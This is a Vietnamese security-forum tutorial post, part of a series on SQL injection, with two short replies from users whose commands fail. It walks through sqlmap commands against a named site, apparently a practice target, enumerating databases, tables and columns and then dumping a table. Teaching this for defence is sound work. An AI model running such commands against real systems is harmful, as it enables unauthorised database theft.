Web6: SQL injection - Một số tool khai thác

Thảo luận trong 'Web Security' bắt đầu bởi Mask, 20/02/14, 10:02 AM.

  1. Mask

    Mask Moderator

    Tham gia: 03/07/13, 08:07 AM
    Bài viết: 25
    Đã được thích: 19
    Điểm thành tích:
    18

    Web6: SQL injection - Một số tool khai thác



    Các chuyên đề nhỏ cùng chủ đề:



    Một số tool khai thác

    Hiện nay có rất nhiều công cụ quét lỗ hổng bảo mật (bao gồm SQL injection). Những công cụ này cho phép phát hiện vào khai thác lỗ hổng SQL injection khá mạnh mẽ. Một số công cụ khai thác lỗ hổng SQL injection tự động hay được sử dụng như:

    Dưới đây tôi sẽ demo việc sử dụng Sqlmap để khai thác SQL injection cơ bản.
    Bạn download Sqlmap tại http://sqlmap.org/
    Sqlmap được viết bằng ngôn ngữ Python, vì vậy để sử dụng tool này bạn cần cài đặt Python. Bạn có thể download python tại http://www.python.org/downloads/
    Đầu tiên bạn phải xác định được website mục tiêu, ở đây tôi có mục tiêu sau:
    http://zerocoolhf.altervista.org/level1.php?id=1

    Bước 1: Mở cmd và gõ lệnh như sau:
    Mã:
    python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
    sqlmap sẽ phát hiện lỗ hổng của mục tiêu vào đưa ra thông tin về lỗ hổng.

    [​IMG]

    Bước 2: Khi đã xác định được là website mục tiêu tồn tại lỗ hổng SQL injection, ta tiến hành tìm tên cơ sở dữ liệu.
    Mã:
    python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
    [​IMG]

    =>Cơ sở dữ liệu: my_zerocoolhf

    Bước 3: Sau khi xác định được tên cơ sở dữ liệu, ta sẽ tìm tiếp tên các bảng có trong cơ sở dữ liệu.
    Mã:
    python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
    [​IMG]

    => Có 2 bảng trong cơ sở dữ liệu: auth và book

    Bước 4: Xác định tên các cột trong bảng
    Mã:
    python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book

    [​IMG]

    => Xác định được các cột trong bảng book: author, id, price, title.

    Bước 5:
    Dump dữ liệu từ bảng.

    Mã:
    python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book

    [​IMG]

    => Như vậy ta đã lấy được cơ sở dữ liệu của website mục tiêu.

    Trên đây là demo cơ bản về sử dụng sqlmap để khai thác lỗi SQL injection, các bạn có thể tìm hiểu thêm các tùy chọn của sqlmap tại https://github.com/sqlmapproject/sqlmap/wiki/Usage để hỗ trợ việc khai thác SQL injection.

    Chuyên đề tiếp theo - “W7: SQL injection – Các cách phòng chống & Kết luận
     
    Last edited by a moderator: 15/09/14, 04:09 PM
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    Cord thích bài này.
  2. GreenHatVN

    GreenHatVN Member

    Tham gia: 22/07/17, 10:07 AM
    Bài viết: 16
    Đã được thích: 3
    Điểm thành tích:
    3
    anh ơi sao em không chạy được ạ , em nhập python .... thì bị lỗi
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. Hoàng Kỳ

    Hoàng Kỳ Member

    Tham gia: 13/12/17, 08:12 PM
    Bài viết: 15
    Đã được thích: 1
    Điểm thành tích:
    3
    Dùng mã lệnh ko được ạ
     
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan